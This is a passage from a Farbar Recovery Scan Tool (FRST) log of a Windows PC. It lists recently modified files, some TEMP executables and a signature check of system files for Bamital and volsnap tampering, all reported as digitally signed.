- 2017-02-26 22:51 - 00000000 ____D C:\Users\Oli\AppData\Local\CrashDumps 2017-05-11 21:56 - 2013-08-22 17:36 - 00000000 ___HD C:\WINDOWS\ELAMBKUP 2017-05-11 19:16 - 2017-04-05 09:21 - 00001944 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk 2017-05-10 10:40 - 2017-02-19 03:26 - 00818732 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2017-05-08 09:00 - 2017-02-19 03:34 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2017-05-04 11:12 - 2017-04-07 14:55 - 00000000 ____D C:\Users\Oli\Desktop\MGR 2017-05-02 12:38 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\LiveKernelReports 2017-04-29 00:44 - 2017-02-23 23:42 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2017-04-29 00:44 - 2017-02-23 23:42 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2017-04-22 21:47 - 2017-04-15 16:40 - 00215950 _____ C:\Users\Oli\Desktop\1993.xlsx 2017-04-22 21:47 - 2017-04-06 22:40 - 00031202 _____ C:\Users\Oli\Desktop\analiza 1.xlsx 2017-04-22 21:47 - 2017-04-03 20:08 - 00053688 _____ C:\Users\Oli\Desktop\1989.xlsx Some files in TEMP: ==================== 2017-03-23 17:19 - 2017-03-23 17:19 - 4074250 _____ (Napisy24.pl ) C:\Users\Oli\AppData\Local\Temp\Napisy24.exe 2017-04-03 18:15 - 2006-10-27 23:14 - 0145184 ____R (Microsoft Corporation) C:\Users\Oli\AppData\Local\Temp\ose00000.exe 2017-02-24 22:22 - 2017-02-24 22:22 - 0039245 _____ () C:\Users\Oli\AppData\Local\Temp\t.dll ==================== Bamital & volsnap ====================== (There is no automatic fix for files that do not pass verification.) C:\WINDOWS\system32\winlogon.exe => File is digitally signed C:\WINDOWS\system32\wininit.exe => File is digitally signed C:\WINDOWS\explorer.exe => File is digitally signed C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed C:\WINDOWS\system32\svchost.exe => File is digitally signed C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed C:\WINDOWS\system32\services.exe => File is digitally signed C:\WINDOWS\system32\User32.dll => File is digitally signed C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed C:\WINDOWS\system32\userinit.exe => File is digitally signed C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed C:\WINDOWS\system32\rpcss.dll => File is digitally signed C:\WINDOWS\system32\dnsapi.dll => File is digitally signed C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2017-05-08 15:38 ==================== End of FRST.txt ============================